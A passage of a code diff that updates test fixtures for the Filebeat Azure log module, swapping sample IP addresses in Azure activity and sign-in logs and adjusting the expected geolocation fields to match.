-        "geo.country_iso_code": "GB",
-        "geo.country_name": "United Kingdom",
-        "geo.location.lat": 51.4964,
-        "geo.location.lon": -0.1224,
+        "geo.city_name": "Milton",
+        "geo.continent_name": "North America",
+        "geo.country_iso_code": "US",
+        "geo.country_name": "United States",
+        "geo.location.lat": 47.2513,
+        "geo.location.lon": -122.3149,
+        "geo.region_iso_code": "US-WA",
+        "geo.region_name": "Washington",
         "input.type": "log",
         "log.level": "Information",
         "log.offset": 0,
         "related.ip": [
-            "51.251.141.41"
+            "216.160.83.61"
         ],
         "service.type": "azure",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4964,
-        "source.geo.location.lon": -0.1224,
-        "source.ip": "51.251.141.41",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "tags": [
             "forwarded"
         ]
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log
index d1f15fa5d1d7..0a57f9beda1f 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log
+++ b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log
@@ -1 +1 @@
-{"time":"2015-01-21T22:14:26.9792776Z","resourceId":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","operationName":"microsoft.support/supporttickets/write","category":"Write","resultType":"Success","resultSignature":"Succeeded.Created","durationMs":2826,"callerIpAddress":"111.111.111.11","correlationId":"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8","identity":{"authorization":{"scope":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","action":"microsoft.support/supporttickets/write","evidence":{"role":"Subscription Admin"}},"claims":{"aud":"https://management.core.windows.net/","iss":"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/","iat":"1421876371","nbf":"1421876371","exp":"1421880271","ver":"1.0","http://schemas.microsoft.com/identity/claims/tenantid":"1e8d8218-c5e7-4578-9acc-9abbd5d23315 ","http://schemas.microsoft.com/claims/authnmethodsreferences":"pwd","http://schemas.microsoft.com/identity/claims/objectidentifier":"2468adf0-8211-44e3-95xq-85137af64708","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn":"admin@contoso.com","puid":"20030000801A118C","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname":"John","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":"Smith","name":"John Smith","groups":"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":" admin@contoso.com","appid":"c44b4083-3bq0-49c1-b47d-974e53cbdf3c","appidacr":"2","http://schemas.microsoft.com/identity/claims/scope":"user_impersonation","http://schemas.microsoft.com/claims/authnclassreference":"1"}},"level":"Information","location":"global","properties":{"statusCode":"Created","serviceRequestId":"50d5cddb-8ca0-47ad-9b80-6cde2207f97c"}}
+{"time":"2015-01-21T22:14:26.9792776Z","resourceId":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","operationName":"microsoft.support/supporttickets/write","category":"Write","resultType":"Success","resultSignature":"Succeeded.Created","durationMs":2826,"callerIpAddress":"81.2.69.143","correlationId":"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8","identity":{"authorization":{"scope":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","action":"microsoft.support/supporttickets/write","evidence":{"role":"Subscription Admin"}},"claims":{"aud":"https://management.core.windows.net/","iss":"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/","iat":"1421876371","nbf":"1421876371","exp":"1421880271","ver":"1.0","http://schemas.microsoft.com/identity/claims/tenantid":"1e8d8218-c5e7-4578-9acc-9abbd5d23315 ","http://schemas.microsoft.com/claims/authnmethodsreferences":"pwd","http://schemas.microsoft.com/identity/claims/objectidentifier":"2468adf0-8211-44e3-95xq-85137af64708","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn":"admin@contoso.com","puid":"20030000801A118C","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname":"John","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":"Smith","name":"John Smith","groups":"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":" admin@contoso.com","appid":"c44b4083-3bq0-49c1-b47d-974e53cbdf3c","appidacr":"2","http://schemas.microsoft.com/identity/claims/scope":"user_impersonation","http://schemas.microsoft.com/claims/authnclassreference":"1"}},"level":"Information","location":"global","properties":{"statusCode":"Created","serviceRequestId":"50d5cddb-8ca0-47ad-9b80-6cde2207f97c"}}
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json
index 28c9ca7cd009..46fee87db047 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json
+++ b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json
@@ -39,42 +39,46 @@
         "azure.correlation_id": "c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8",
         "azure.resource.id": "/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841",
         "azure.resource.provider": "microsoft.support/supporttickets/115012112305841",
-        "client.ip": "111.111.111.11",
+        "client.ip": "81.2.69.143",
         "cloud.provider": "azure",
         "event.action": "microsoft.support/supporttickets/write",
         "event.dataset": "azure.activitylogs",
         "event.duration": -1468967296,
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"time\":\"2015-01-21T22:14:26.9792776Z\",\"resourceId\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"operationName\":\"microsoft.support/supporttickets/write\",\"category\":\"Write\",\"resultType\":\"Success\",\"resultSignature\":\"Succeeded.Created\",\"durationMs\":2826,\"callerIpAddress\":\"111.111.111.11\",\"correlationId\":\"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8\",\"identity\":{\"authorization\":{\"scope\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"action\":\"microsoft.support/supporttickets/write\",\"evidence\":{\"role\":\"Subscription Admin\"}},\"claims\":{\"aud\":\"https://management.core.windows.net/\",\"iss\":\"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/\",\"iat\":\"1421876371\",\"nbf\":\"1421876371\",\"exp\":\"1421880271\",\"ver\":\"1.0\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"1e8d8218-c5e7-4578-9acc-9abbd5d23315 \",\"http://schemas.microsoft.com/claims/authnmethodsreferences\":\"pwd\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"2468adf0-8211-44e3-95xq-85137af64708\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\":\"admin@contoso.com\",\"puid\":\"20030000801A118C\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\":\"John\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\":\"Smith\",\"name\":\"John Smith\",\"groups\":\"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\":\" admin@contoso.com\",\"appid\":\"c44b4083-3bq0-49c1-b47d-974e53cbdf3c\",\"appidacr\":\"2\",\"http://schemas.microsoft.com/identity/claims/scope\":\"user_impersonation\",\"http://schemas.microsoft.com/claims/authnclassreference\":\"1\"}},\"level\":\"Information\",\"location\":\"global\",\"properties\":{\"statusCode\":\"Created\",\"serviceRequestId\":\"50d5cddb-8ca0-47ad-9b80-6cde2207f97c\"}}",
+        "event.original": "{\"time\":\"2015-01-21T22:14:26.9792776Z\",\"resourceId\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"operationName\":\"microsoft.support/supporttickets/write\",\"category\":\"Write\",\"resultType\":\"Success\",\"resultSignature\":\"Succeeded.Created\",\"durationMs\":2826,\"callerIpAddress\":\"81.2.69.143\",\"correlationId\":\"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8\",\"identity\":{\"authorization\":{\"scope\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"action\":\"microsoft.support/supporttickets/write\",\"evidence\":{\"role\":\"Subscription Admin\"}},\"claims\":{\"aud\":\"https://management.core.windows.net/\",\"iss\":\"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/\",\"iat\":\"1421876371\",\"nbf\":\"1421876371\",\"exp\":\"1421880271\",\"ver\":\"1.0\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"1e8d8218-c5e7-4578-9acc-9abbd5d23315 \",\"http://schemas.microsoft.com/claims/authnmethodsreferences\":\"pwd\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"2468adf0-8211-44e3-95xq-85137af64708\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\":\"admin@contoso.com\",\"puid\":\"20030000801A118C\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\":\"John\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\":\"Smith\",\"name\":\"John Smith\",\"groups\":\"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\":\" admin@contoso.com\",\"appid\":\"c44b4083-3bq0-49c1-b47d-974e53cbdf3c\",\"appidacr\":\"2\",\"http://schemas.microsoft.com/identity/claims/scope\":\"user_impersonation\",\"http://schemas.microsoft.com/claims/authnclassreference\":\"1\"}},\"level\":\"Information\",\"location\":\"global\",\"properties\":{\"statusCode\":\"Created\",\"serviceRequestId\":\"50d5cddb-8ca0-47ad-9b80-6cde2207f97c\"}}",
         "event.outcome": "success",
         "event.type": [
             "change"
         ],
         "fileset.name": "activitylogs",
-        "geo.continent_name": "Asia",
-        "geo.country_iso_code": "JP",
-        "geo.country_name": "Japan",
-        "geo.location.lat": 35.69,
-        "geo.location.lon": 139.69,
+        "geo.city_name": "London",
+        "geo.continent_name": "Europe",
+        "geo.country_iso_code": "GB",
+        "geo.country_name": "United Kingdom",
+        "geo.location.lat": 51.5142,
+        "geo.location.lon": -0.0931,
+        "geo.region_iso_code": "GB-ENG",
+        "geo.region_name": "England",
         "input.type": "log",
         "log.level": "Information",
         "log.offset": 0,
         "related.ip": [
-            "111.111.111.11"
+            "81.2.69.143"
         ],
         "related.user": [
             "admin"
         ],
         "service.type": "azure",
-        "source.as.number": 2516,
-        "source.as.organization.name": "KDDI CORPORATION",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "JP",
-        "source.geo.country_name": "Japan",
-        "source.geo.location.lat": 35.69,
-        "source.geo.location.lon": 139.69,
-        "source.ip": "111.111.111.11",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
index 76dbbd932086..1a3dc7af76f9 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
@@ -1,3 +1,3 @@
-{"Level":4,"callerIpAddress":"81.171.241.231","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
-{"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
-{"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","durationMs":0,"identity":"Doe, John","location":"US","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office365 Shell WCSS-Client","appId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"On-Prem Access Only","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"123ebbf1-e868-4a77-bfd9-b59bd6c2412e","result":"notApplied"},{"conditionsNotSatisfied":0,"conditionsSatisfied":0,"displayName":"ForceMFAfor B2C","enforcedGrantControls":[],"enforcedSessionControls":[],"id":"0dff3d49-001e-413f-86eb-2800e789674c","result":"notEnabled"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline policy: Require MFA for admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"a5527e71-9da1-41d0-859b-7ca84dae03a7","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline Policy: Blocks legacy authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"c1311105-97ac-4ebd-a866-5b215d066765","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"Netscaler MFA","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"ee756a5f-8c3b-41eb-8ace-0839597f718a","result":"notApplied"},{"conditionsNotSatisfied":8,"conditionsSatisfied":19,"displayName":"Enforce Verification on External Access","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"913f5adc-cd20-4b35-93b8-fbe145f68444","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Test Policy","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa","result":"notApplied"}],"authenticationDetails":[{"RequestSequence":0,"StatusSequence":0,"authenticationMethod":"Previously satisfied","authenticationStepDateTime":"2021-01-26T13:39:55.7863053+00:00","authenticationStepRequirement":"Primary authentication","authenticationStepResultDetail":"First factor requirement satisfied by claim in the token","succeeded":true}],"authenticationProcessingDetails":[{"key":"Domain Hint Present","value":"True"},{"key":"Login Hint Present","value":"True"},{"key":"Private Link Id","value":"0"},{"key":"Azure AD App Authentication Library","value":"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"clientAppUsed":"Browser","conditionalAccessStatus":"success","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","createdDateTime":"2021-01-26T13:39:55.7863053+00:00","deviceDetail":{"browser":"Chrome 87.0.4280","deviceId":"","operatingSystem":"Windows 10"},"flaggedForReview":false,"id":"a9222177-db03-40ef-9b86-5b207ed72000","ipAddress":"192.168.108.29","isInteractive":true,"location":{"city":"Pierre","countryOrRegion":"US","geoCoordinates":{"latitude":44.567081451416016,"longitude":-100.26722717285156},"state":"South Dakota"},"networkLocationDetails":[],"originalRequestId":"a9222177-db03-40ef-9b86-5b207ed72000","processingTimeInMilliseconds":162,"resourceDisplayName":"Microsoft Graph","resourceId":"00000003-0000-0000-c000-000000000000","resourceTenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36","userDisplayName":"Doe, John","userId":"762a6171-29d0-456b-b88b-ca7f7d99728d","userPrincipalName":"john.doe@example.com","userType":"Member"},"resourceId":"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","time":"2021-01-26T13:39:55.7863053Z"}
+{"Level":4,"callerIpAddress":"67.43.156.12","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"67.43.156.12","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
+{"Level":4,"callerIpAddress":"175.16.199.1","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"67.43.156.12","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
+{"Level":4,"callerIpAddress":"175.16.199.1","category":"SignInLogs","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","durationMs":0,"identity":"Doe, John","location":"US","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office365 Shell WCSS-Client","appId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"On-Prem Access Only","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"123ebbf1-e868-4a77-bfd9-b59bd6c2412e","result":"notApplied"},{"conditionsNotSatisfied":0,"conditionsSatisfied":0,"displayName":"ForceMFAfor B2C","enforcedGrantControls":[],"enforcedSessionControls":[],"id":"0dff3d49-001e-413f-86eb-2800e789674c","result":"notEnabled"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline policy: Require MFA for admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"a5527e71-9da1-41d0-859b-7ca84dae03a7","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline Policy: Blocks legacy authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"c1311105-97ac-4ebd-a866-5b215d066765","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"Netscaler MFA","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"ee756a5f-8c3b-41eb-8ace-0839597f718a","result":"notApplied"},{"conditionsNotSatisfied":8,"conditionsSatisfied":19,"displayName":"Enforce Verification on External Access","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"913f5adc-cd20-4b35-93b8-fbe145f68444","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Test Policy","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa","result":"notApplied"}],"authenticationDetails":[{"RequestSequence":0,"StatusSequence":0,"authenticationMethod":"Previously satisfied","authenticationStepDateTime":"2021-01-26T13:39:55.7863053+00:00","authenticationStepRequirement":"Primary authentication","authenticationStepResultDetail":"First factor requirement satisfied by claim in the token","succeeded":true}],"authenticationProcessingDetails":[{"key":"Domain Hint Present","value":"True"},{"key":"Login Hint Present","value":"True"},{"key":"Private Link Id","value":"0"},{"key":"Azure AD App Authentication Library","value":"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"clientAppUsed":"Browser","conditionalAccessStatus":"success","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","createdDateTime":"2021-01-26T13:39:55.7863053+00:00","deviceDetail":{"browser":"Chrome 87.0.4280","deviceId":"","operatingSystem":"Windows 10"},"flaggedForReview":false,"id":"a9222177-db03-40ef-9b86-5b207ed72000","ipAddress":"192.168.108.29","isInteractive":true,"location":{"city":"Pierre","countryOrRegion":"US","geoCoordinates":{"latitude":44.567081451416016,"longitude":-100.26722717285156},"state":"South Dakota"},"networkLocationDetails":[],"originalRequestId":"a9222177-db03-40ef-9b86-5b207ed72000","processingTimeInMilliseconds":162,"resourceDisplayName":"Microsoft Graph","resourceId":"00000003-0000-0000-c000-000000000000","resourceTenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36","userDisplayName":"Doe, John","userId":"762a6171-29d0-456b-b88b-ca7f7d99728d","userPrincipalName":"john.doe@example.com","userType":"Member"},"resourceId":"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","time":"2021-01-26T13:39:55.7863053Z"}
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json
index 5ab1d77072a0..cf617019525a 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json
+++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json
@@ -36,7 +36,7 @@
         "azure.signinlogs.result_signature": "None",
         "azure.signinlogs.result_type": "50140",
         "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
-        "client.ip": "81.171.241.231",
+        "client.ip": "67.43.156.12",
         "cloud.provider": "azure",
         "event.action": "Sign-in activity",
         "event.category": [
@@ -47,7 +47,7 @@
         "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
         "event.kind": "event",
         "event.module": "azure",
